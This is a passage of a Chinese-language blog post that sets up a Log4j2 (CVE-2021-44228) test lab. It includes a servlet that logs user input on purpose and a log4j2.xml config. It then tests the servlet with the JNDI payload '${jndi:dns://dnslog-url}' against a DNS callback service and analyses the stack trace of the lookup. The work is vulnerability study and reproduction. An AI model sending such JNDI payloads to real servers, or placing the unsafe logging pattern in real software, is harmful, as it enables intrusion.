Step1<\/strong>
Web-src-main-java\u521b\u5efa Log4j2Servlet\u7c7b<\/p>\n\n\n\n
package Cve.Log4j2;\n\nimport org.apache.logging.log4j.LogManager;\nimport org.apache.logging.log4j.Logger;\n\nimport javax.servlet.ServletException;\nimport javax.servlet.annotation.WebServlet;\nimport javax.servlet.http.HttpServlet;\nimport javax.servlet.http.HttpServletRequest;\nimport javax.servlet.http.HttpServletResponse;\nimport java.io.IOException;\n\n@WebServlet(\"\/log\")\npublic class Log4j2Servlet extends HttpServlet {\n private static final Logger logger = LogManager.getLogger(Log4j2Servlet.class);\n\n \/\/ \u786e\u4fdd\u6709 public \u65e0\u53c2\u6784\u9020\u51fd\u6570\n public Log4j2Servlet() {\n \/\/ \u53ef\u4ee5\u4e3a\u7a7a\n }\n\n @Override\n protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n \/\/ \u8bbe\u7f6e\u8bf7\u6c42\u7684\u5b57\u7b26\u7f16\u7801\u4e3a UTF-8\n request.setCharacterEncoding(\"UTF-8\");\n \/\/ \u8bbe\u7f6e\u54cd\u5e94\u7684\u5b57\u7b26\u7f16\u7801\u4e3a UTF-8\n response.setCharacterEncoding(\"UTF-8\");\n \/\/ \u8bbe\u7f6e\u54cd\u5e94\u7684\u5185\u5bb9\u7c7b\u578b\u4e3a text\/html\n response.setContentType(\"text\/html; charset=UTF-8\");\n String inputText = request.getParameter(\"inputText\");\n logger.info(\"\u8fdb\u5165 doPost \u65b9\u6cd5\uff0c\u7528\u6237\u8f93\u5165: {}\", inputText);\n response.getWriter().println(\"\u5df2\u8bb0\u5f55\u8f93\u5165: \" + inputText);\n }\n}<\/pre>\n\n\n\nStep2<\/strong>
Web-src-main-resources\u521b\u5efalog4j2.xml\u914d\u7f6e\u6587\u4ef6<\/p>\n\n\n\n<Configuration status=\"WARN\">\n <Appenders>\n <Console name=\"Console\" target=\"SYSTEM_OUT\">\n <PatternLayout charset=\"UTF-8\" pattern=\"%d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n\"\/>\n <\/Console>\n <\/Appenders>\n <Loggers>\n <Root level=\"info\">\n <AppenderRef ref=\"Console\"\/>\n <\/Root>\n <\/Loggers>\n<\/Configuration><\/pre>\n\n\n\nStep3(\u53ef\u9009)
IDEA-Configuration-Server-VM options\uff1a\u6dfb\u52a0 -Dlog4j.debug<\/p>\n\n\n\n
0x02 \u6d4b\u8bd5<\/strong><\/h2>\n\n\n\n\u901a\u8fc7dnslog\u5e73\u53f0\u6d4b\u8bd5
1\u3001\u5728dnslog\u83b7\u53d6subdomain
2\u3001\u8bbf\u95ee\u6d4b\u8bd5\u5730\u5740\uff0c\u8f93\u5165payload\uff1a${jndi:dns:\/\/dnslog-url}
<\/p>\n\n\n\n![\"\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/figure>\n\n\n\n<\/div><\/figure>\n\n\n\n3\u3001\u67e5\u770bdnslog\u5e73\u53f0
<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n4\u3001\uff08\u914d\u7f6e-Dlog4j.debug\uff09\u67e5\u770b\u63a7\u5236\u53f0\u8f93\u51fa<\/p>\n\n\n\n
WARN StatusLogger Error looking up JNDI resource [dns:\/\/69f9033a.log.dnslog.sbs].\n javax.naming.CommunicationException: DNS error [Root exception is java.net.SocketTimeoutException: Receive timed out]; remaining name '.'\n\tat com.sun.jndi.dns.DnsClient.query(DnsClient.java:312)\n\tat com.sun.jndi.dns.Resolver.query(Resolver.java:81)\n\tat com.sun.jndi.dns.DnsContext.c_lookup(DnsContext.java:290)\n\tat com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(ComponentContext.java:542)\n\tat com.sun.jndi.toolkit.ctx.PartialCompositeContext.lookup(PartialCompositeContext.java:177)\n\tat com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:205)\n\tat javax.naming.InitialContext.lookup(InitialContext.java:417)\n\tat org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)\n\tat org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56)\n\tat org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:221)\n\tat org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1110)\n\tat org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1033)\n\tat org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912)\n\tat org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:467)\n\tat org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:132)\n\tat org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)\n\tat org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:344)\n\tat org.apache.logging.log4j.core.layout.PatternLayout.toText(PatternLayout.java:244)\n\tat org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:229)\n\tat org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:59)\n\tat org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.directEncodeEvent(AbstractOutputStreamAppender.java:197)\n\tat org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.tryAppend(AbstractOutputStreamAppender.java:190)\n\tat org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:181)\n\tat org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156)\n\tat org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129)\n\tat org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120)\n\tat org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84)\n\tat org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:540)\n\tat org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:498)\n\tat org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:481)\n\tat org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:456)\n\tat org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(AwaitCompletionReliabilityStrategy.java:82)\n\tat org.apache.logging.log4j.core.Logger.log(Logger.java:161)\n\tat org.apache.logging.log4j.spi.AbstractLogger.tryLogMessage(AbstractLogger.java:2205)\n\tat org.apache.logging.log4j.spi.AbstractLogger.logMessageTrackRecursion(AbstractLogger.java:2159)\n\tat org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java:2142)\n\tat org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:2034)\n\tat org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:1899)\n\tat org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1444)\n\tat Cve.Log4j2.Log4j2Servlet.doPost(Log4j2Servlet.java:31)\n\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:652)\n\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:733)\n\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:231)\n\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)\n\tat org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)\n\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)\n\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)\n\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:201)\n\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)\n\tat org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:544)\n\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:143)\n\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:81)\n\tat org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:698)\n\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)\n\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:364)\n\tat org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:616)\n\tat org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)\n\tat org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:831)\n\tat org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1629)\n\tat org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)\n\tat java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)\n\tat java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)\n\tat org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\n\tat java.lang.Thread.run(Thread.java:748)\nCaused by: java.net.SocketTimeoutException: Receive timed out\n\tat java.net.DualStackPlainDatagramSocketImpl.socketReceiveOrPeekData(Native Method)\n\tat java.net.DualStackPlainDatagramSocketImpl.receive0(DualStackPlainDatagramSocketImpl.java:124)\n\tat java.net.AbstractPlainDatagramSocketImpl.receive(AbstractPlainDatagramSocketImpl.java:143)\n\tat java.net.DatagramSocket.receive(DatagramSocket.java:812)\n\tat com.sun.jndi.dns.DnsClient.doUdpQuery(DnsClient.java:422)\n\tat com.sun.jndi.dns.DnsClient.query(DnsClient.java:211)\n\t... 63 more\nDEBUG StatusLogger AsyncLogger.ThreadNameStrategy=UNCACHED (user specified null, default is UNCACHED)\nTRACE StatusLogger Using default SystemClock for timestamps.\nDEBUG StatusLogger org.apache.logging.log4j.core.util.SystemClock does not support precise timestamps.\n<\/pre>\n\n\n\n\u53ef\u4ee5\u770b\u5230Dnslog\u8d85\u65f6\u4e86\uff0c\u53ef\u6dfb\u52a0 -Dsun.net.inetaddr.ttl=10000\uff0c\u5f3a\u5236\u4f7f\u7528TCP\u8fdb\u884cDNS\u67e5\u8be2 System.setProperty(“sun.net.spi.nameservice.dns.tcp”, “true”);\u7b49\u65b9\u6cd5\uff0c\u8fd9\u4e2a\u95ee\u9898\u6ca1\u6709\u7ec6\u7a76\uff0c\u56e0\u4e3aIDEA\u53ef\u4ee5\u914d\u7f6e\u4ee3\u7406(^<\/em>_^<\/em>)\u3002
\u5728\u8fdb\u4e00\u6b65\u67e5\u770b\uff0c\u62a5\u9519\u4fe1\u606f\uff0c\u7ed3\u5408\u4e4b\u524d\u5bf9Log4j2\u7684\u5206\u6790
log4j-core.jar\\org\\apache\\logging\\log4j\\core\\lookup
\u5728\u62a5\u9519\u4e2d\u6216\u8005agent\u7684\u8f93\u51fa\u4e2d\uff0c\u90fd\u80fd\u770b\u5230lookup\u7684\u8c03\u7528\u8fc7\u7a0b
\u901a\u8fc7Agent\u67e5\u770b\u7684\u7c7b\u52a0\u8f7d\u8fc7\u7a0b<\/p>\n\n\n\n![\"\u901a\u8fc7Agent\u83b7\u53d6\u7684class\u52a0\u8f7d\u8fc7\u7a0b\n\"](\"http:\/\/www.nokws.top\/wp-content\/uploads\/2025\/03\/image-7.png\" "\\"Agent\u622a\u56fe\\"")
<\/figure>\n\n\n\n\u901a\u8fc7\u62a5\u9519\u67e5\u770b\u7684\u7c7b\u52a0\u8f7d\u8fc7\u7a0b<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n0x0<\/strong>3 \u9632\u5fa1<\/h2>\n\n\n\n\u68c0\u6d4b\u5230\u7279\u5b9a\u7684\u7c7b\u52a0\u8f7d\uff0c\u901a\u8fc7\u66f4\u6362\u5b57\u8282\u7801\uff1f\u963b\u65ad\u7c7b\u7684\u52a0\u8f7d\u8fdb\u884c\u9632\u5fa1\uff08\u5f85\u5b9e\u73b0\uff09<\/p>\n\n\n\n
0x04 \u53c2\u8003<\/h2>\n\n\n\n
\u4e71\u7801\u95ee\u9898\uff1a
\u5206\u4eab\u4e00\u6b21\u89e3\u51b3 IDEA \u4e2d\u6587\u65e5\u5fd7\u63a7\u5236\u53f0\u6253\u5370\u4e71\u7801(log4j)\u7684\u7ecf\u9a8c_idea \u4e2dlog4j\u4e71\u7801-CSDN\u535a\u5ba2<\/a>
\u4e71\u7801\u95ee\u9898\u603b\u7ed3\uff1a\u5e38\u89c1\u7684\u4e2d\u6587\u4e71\u7801\u95ee\u9898-CSDN\u535a\u5ba2<\/a>
Lo4j2\u6f0f\u6d1e\u5206\u6790\uff1a
Apache Log4j2 RCE\u539f\u7406\u9a8c\u8bc1\u548c\u590d\u73b0\uff08\u9644CVE-2021-4101\u5e94\u6025\u5904\u7f6e\uff09 – FreeBuf\u7f51\u7edc\u5b89\u5168\u884c\u4e1a\u95e8\u6237<\/a>
Apache Log4j2 RCE\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u5206\u6790 – FreeBuf\u7f51\u7edc\u5b89\u5168\u884c\u4e1a\u95e8\u6237<\/a>
Log4j2\u2014\u6f0f\u6d1e\u5206\u6790(CVE-2021-44228) – \u7af9\u7b49\u5bd2 – \u535a\u5ba2\u56ed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"0x01 \u73af\u5883\u642d\u5efa \u5728\u4e0a\u7bc7\u6587\u7ae0\u7684\u57fa\u7840\u4e0a\uff0c\u6dfb\u52a0log4j2\u9776\u573aStep1Web-src-main-java\u521b\u5efa […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1069","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"jetpack_featured_media_url":"","_links":{"self":[{"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/posts\/1069","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/comments?post=1069"}],"version-history":[{"count":6,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/posts\/1069\/revisions"}],"predecessor-version":[{"id":1083,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/posts\/1069\/revisions\/1083"}],"wp:attachment":[{"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/media?parent=1069"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/categories?post=1069"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/tags?post=1069"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"\"](\"http:\/\/www.nokws.top\/wp-content\/uploads\/2025\/03\/image-5.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"http:\/\/www.nokws.top\/wp-content\/uploads\/2025\/03\/image-10.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"http:\/\/www.nokws.top\/wp-content\/uploads\/2025\/03\/image-6.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"http:\/\/www.nokws.top\/wp-content\/uploads\/2025\/03\/image-8.png\")
<\/div><\/figure>\n\n\n\n